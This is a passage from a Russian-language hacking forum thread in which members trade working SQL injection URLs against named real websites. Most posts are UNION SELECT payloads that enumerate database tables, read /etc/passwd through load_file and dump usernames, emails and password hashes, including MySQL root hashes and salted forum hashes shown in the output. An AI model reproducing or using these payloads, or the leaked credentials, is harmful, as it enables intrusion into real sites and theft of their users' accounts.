SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. ice1k

    ice1k Banned

    Joined:
    1 Jan 2007
    Messages:
    462
    Likes Received:
    382
    Reputations:
    490
    Да, это base64.

    Можешь подампить базу тут:
    _http://mbclan.org/forum/install/upgrade_301.php?step=hello
     
    #2381 ice1k, 1 Jun 2007
    Last edited: 1 Jun 2007
    4 people like this.
  2. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Гы, чёто больше ничего сделать не могу =\
     
    1 person likes this.
  3. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    Не везёт мне.. Больше ничего сделать не могу.
    Та же песня.
    root:45ddce093e0d5d85
    Вот терь гуд :)
    Вот..
    Вот эта скуля меня радует :)
    Хаха :)))
    :eek:
    Для тех кто знает китайский =\ :)
     
    #2383 NOmeR1, 2 Jun 2007
    Last edited: 2 Jun 2007
    2 people like this.
  4. fjuDao

    fjuDao Member

    Joined:
    27 May 2006
    Messages:
    3
    Likes Received:
    7
    Reputations:
    5
    _http://www.koss.ru/press.php?id=666 union select 0,0,0,0,1,2/*
     
  5. Neorin

    Neorin Elder - Старейшина

    Joined:
    30 Apr 2007
    Messages:
    48
    Likes Received:
    15
    Reputations:
    0

    чуть не правельно постоил....попробуй так)))
    http://www.koss.ru/press.php?id=666+union+select+1,concat(USER(),0x3a,VERSION(),0x%203a,DATABASE()),3,4,5,6,7,8,9,10,11,12/*

    вот тогда как красиво получиться))))

    Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/koss-www/classes/article_out.php on line 47

    Edited by ice1k:
    Склеил твои посты. Впредь не пиши по несколько постов подряд - редактируй пост и добавляй.
     
    #2385 Neorin, 2 Jun 2007
    Last edited by a moderator: 2 Jun 2007
  6. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2Neorin
    Непонял малость...
    У fjuDao правильно (в отличии от тебя) запрос построен.


    И в свете недавней темы:
    Code:
    http://contaximages.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
    Code:
    http://www.harphampix.com/v2/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
     
  7. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
    Code:
    http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
    USER: risla@localhost
    DATABASE: risla
    VERSION: 4.0.18-nt

    Компания Стокмэн
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*
    USER: kalitka@localhost
    DATABASE: kalitka-plitka
    VERSION: 5.0.32-Debian_7etch1-log
     
    #2387 Пчел, 2 Jun 2007
    Last edited: 2 Jun 2007
    1 person likes this.
  8. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90

    Уря наконец, попался 5 мускул )) можно поупражняться в использовании information_schema )
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,Table_name,database(),4,version(),6,7+from+information_schema.tables+limit+35,1/*
    Получили таблицу ms_user

    Попытался терь получить имена столбцов
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*
    но что-то незаладилось, может чтото делаю неправильно ?
     
    #2388 geezer.code, 2 Jun 2007
    Last edited by a moderator: 2 Jun 2007
  9. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Да, что-то у меня тоже не получается вывести имена стобцов :mad:
     
  10. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2Пчел
    Если не знаешь, что сказать, то лучше промолчать.
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(109,115,95,117,115,101,114)+limit+0,1/*
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(user_login,char(58),user_passwd,char(58),user_email),3,4,5,6,7+from+ms_user/*
    Code:
    http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(login,char(58),name,char(58),password),3,4,5,6,7+from+ms_access_users/*
     
    #2390 kamaz, 2 Jun 2007
    Last edited: 2 Jun 2007
    2 people like this.
  11. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    2kamaz
    Я просто этим постом попросил о помощи, но понял что ты имел в виду. Кстати, спасибо что помог разобраться. Что бы не было офтопом:

    General Store Publishing House!
    Code:
    http://www.gsph.com/index.php?ID=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,[U][B]12[/B][/U],13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&Lang=EN
    USER: [email protected]
    DATABASE: indelta_gsph
    VERSION: 5.0.37-standard-log
     
  12. GooD and EviL

    GooD and EviL Banned

    Joined:
    17 Feb 2007
    Messages:
    79
    Likes Received:
    24
    Reputations:
    0
    HTML:
    http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/*
     
    1 person likes this.
  13. V.I.P

    V.I.P Elder - Старейшина

    Joined:
    6 Apr 2007
    Messages:
    69
    Likes Received:
    45
    Reputations:
    -6
    Самые крупные БД когда либо я брал.

    Сайт: www.visionlearning.com
    Версия: 4.0.26
    Колличесвто юзеров: 31001
    PHP:
    http://www.visionlearning.com/library/flash_viewer.php?oid=-21+union+select+1,concat_ws(char(58),username,password,email),3,4+from+users+limit+31000,31001/*
    ice1k: Убрал аптайм.ру. Не забываем посматривать антибоян:
    _http://hack-shop.org.ru/sql.php

    Ok.


    Сайт:www.dotfiles.com
    Версия:5.0.38
    PHP:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(name,char(58),email)+from+user--
    Хм,странно в information_schema.columns есть password

    Но на деле не работет (.
     
    #2393 V.I.P, 2 Jun 2007
    Last edited: 2 Jun 2007
  14. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2V.I.P
    Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.

    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(user,char(58),password)+from+mysql.user--
    И еще в таблице users c различными перфиксами

    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant.users--
    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant_dev.users--
    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,password)+from+rblog.users%20limit%209500,1--
     
    2 people like this.
  15. }{0TT@БЬ)Ч

    }{0TT@БЬ)Ч Elder - Старейшина

    Joined:
    20 Jan 2006
    Messages:
    269
    Likes Received:
    140
    Reputations:
    31
    не ожидал такое от тебя, репы вроде не мало ;)
     
    1 person likes this.
  16. Пчел

    Пчел Member

    Joined:
    17 May 2007
    Messages:
    6
    Likes Received:
    7
    Reputations:
    0
    Code:
    http://www.exploro.ro/index.php?module=detalii_excursie&id_get=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/*
    USER: exploro_exploro@localhost
    DATABASE: exploro_exploro
    VERSION: 4.1.21-standard
     
  17. kamaz

    kamaz Elder - Старейшина

    Joined:
    31 Jan 2007
    Messages:
    151
    Likes Received:
    275
    Reputations:
    280
    2}{0TT@БЬ)Ч
    ыыы ;)
    Только щас заметил...

    Раз я тут все равно показываю себя нубом... то может кто-нить обьяснит, почему не получается запрос
    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,  concat(user,char(58),password)+from+mysql-old.user--
    Хотя
    Code:
    http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(table_schema,char(46),table_name)+from+information_schema.columns+where+table_name=CHAR(117,115,101,114)--
     
  18. KPOT_f!nd

    KPOT_f!nd положенец общага

    Joined:
    25 Aug 2006
    Messages:
    1,074
    Likes Received:
    502
    Reputations:
    65
    Code:
    http://www.id-t.nl/news-subpage.php?newsid=-5449+union+select+1,2,3,4,5,6,7,user,password,user(),11,12,13,14,15,16,17,18+from+mysql.user/*
    root:69540c43630a0fad
    [email protected]


    Code:
    http://www.montevideo.nl/en/nieuws/detail.php?id=-108'+union+select+1,2,concat(user(),0x3a,version(),0x3a,database(),0x3a)/*&archief=
    - имееться юзеры+пассы

    Code:
    http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,password,3,username,5+from+users/*
    +limit в помощь...
     
    #2398 KPOT_f!nd, 4 Jun 2007
    Last edited: 4 Jun 2007
    1 person likes this.
  19. Grey

    Grey Banned

    Joined:
    10 Jun 2006
    Messages:
    1,047
    Likes Received:
    1,315
    Reputations:
    1,159
    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
    mysql.user:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(user,char(58),password),5,6,7+from+mysql.user+limit+1,1/*
    root:1da2058b62d7a119

    /etc/passwd:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7/*
    163 таблицы:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+163,1/*
    forum.ibf_members_converge:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(converge_id,char(58),converge_pass_hash,char(58),converge_pass_salt),5,6,7+from+forum.ibf_members_converge+limit+0,1/*
    1:33581792b4c389b0219866f27c29e3b8:~v-nI:::4334925

    lipskerov.phpbb_users:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7+from+lipskerov.phpbb_users+limit+1,1/*
    alien:5f58ac9c3b1c0c3ce51d3092816b96ed:::4312034

    magr.cms_members:

    Колонки:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(99,109,115,95,109,101,109,98,101,114,115)+limit+0,1/*
    Code:
    id
    status
    name
    full_name
    phone_1
    phone_2
    phone_3
    phone_4
    fax
    site
    email
    director_name
    director_dolz
    login
    pass
    in_org
    sert
    licen
    full_info
    Вывод инфы:

    Code:
    http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(id,char(58),name),5,6,7+from+magr.cms_members+limit+0,1/*
     
    3 people like this.
  20. Joker-jar

    Joker-jar Elder - Старейшина

    Joined:
    11 Mar 2007
    Messages:
    581
    Likes Received:
    205
    Reputations:
    37
    http://www.proplay.ru/users/login/

    Уязвимо поле "пароль" (при ' выдает ошибку мускула). Но пара admin : 1 or 1=1/* не проканала :(
     
Thread Status:
Not open for further replies.